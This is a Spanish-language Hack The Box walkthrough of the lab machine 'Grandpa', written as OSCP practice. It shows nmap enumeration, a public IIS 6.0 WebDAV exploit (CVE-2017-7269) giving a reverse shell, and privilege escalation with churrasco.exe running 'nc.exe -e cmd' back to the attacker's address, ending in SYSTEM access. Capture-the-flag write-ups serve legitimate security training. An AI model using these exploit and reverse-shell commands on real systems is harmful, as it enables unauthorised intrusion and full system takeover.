OSCP Path ~ Grandpa de Hack The Box (Necesario VIP)
Published on 12 Nov 2021
Grandpa ~ Hack The Box to OSCP
Realizamos el Primer escaneo con Nmap
$" nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 10.10.10.14 "
Procedemos a listar la Version y Servicios para los puertos encontrados.
$" nmap -sC -sV -p80 -oN target 10.10.10.14 "
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: "Microsoft-IIS/6.0"
|_http-title: Under Construction
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| WebDAV type: Unknown
| Server Date: Fri, 12 Nov 2021 11:34:26 GMT
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Vemos que tiene un servidor IIS-6.0 bastante desactualizado, procedemos a buscar vulnerabilidades acorder para esta version.
# Buscamos por IIS 6.0 github exploit --> Nos aparece el siguiente exploit
# cat bof_iis_6.py
https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell
Procedemos a probarlo y vemos que es funcional y nos devuelve una consola interactiva
# python bof_iis_6.py
usage:iis6webdav.py targetip targetport reverseip reverseport
$ python bof_iis_6.py 10.10.10.14 80 10.10.16.7 443
Estando a la escucha por el puerto indicado recibimos la conexion entrante.
# rlwrap nc -vlnp 443
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.14] 1030
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>
Procedemos a enumerar un poco el systema
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAuditPrivilege Generate security audits Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
Vemos que tenemos el SeImpersonatePrivilege
Vamos a compartirnos un recurso compartido a nivel de red para pasarnos el JuicyPotato.exe para intentar escalar privilegios con el mismo
$ cd C:\WINDOWS\Temp\Privesc>
$ copy \\10.10.16.7\smbFolder\JuicyPotato.exe JuicyPotato.exe
$ Directory of C:\WINDOWS\Temp\Privesc
11/12/2021 02:30 PM <DIR> .
11/12/2021 02:30 PM <DIR> ..
09/30/2021 08:59 PM 347,648 JuicyPotato.exe
Vale pues procedemos a ejecutarlo.
JuicyPotato.exe
The image file C:\WINDOWS\Temp\Privesc\JuicyPotato.exe is valid, but is for a machine type other than the current machine.
NOS DA ERROR EL JUICYPOTATO .. AHORA QUE??? Procedemos a enumerar el OS que estamos.
systeminfo
Host Name: GRANPA
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 0 Hours, 8 Minutes, 54 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 792 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,328 MB
Page File: In Use: 142 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A
Vamos a buscar por Windows Server 2003 JuicyPotato escalation churrasco.exe
https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
Nos descargamos el binario y procedemos a pasarlo a la maquina victima. Nos copiamos en el directorio actual el nc.exe donde estemos compartiendo el recurso compartido.
churrasco.exe -d "\\10.10.16.7\smbFolder\nc.exe -e cmd 10.10.16.7 4444"
churrasco.exe -d "\\10.10.16.7\smbFolder\nc.exe -e cmd 10.10.16.7 4444"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 684
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x734
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found SYSTEM token 0x72c
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
Recibimos la conexion como Administradores del sistema.
# rlwrap nc -vlnp 4444
listening on [any] 4444 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.14] 1041
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\TEMP>
whoami
whoami
nt authority\system
Procedemos a sacar la flag root.txt
cd Desktop
dir
dir
Volume in drive C has no label.
Volume Serial Number is FDCB-B9EF
Directory of C:\Documents and Settings\Administrator\Desktop
04/12/2017 04:28 PM <DIR> .
04/12/2017 04:28 PM <DIR> ..
04/12/2017 04:29 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 1,317,064,704 bytes free
type root.txt
type root.txt
9359e905a2c35fxxxxxxxxxxxxxxxxxxxx
Maquina Comprometida KO H4ck =)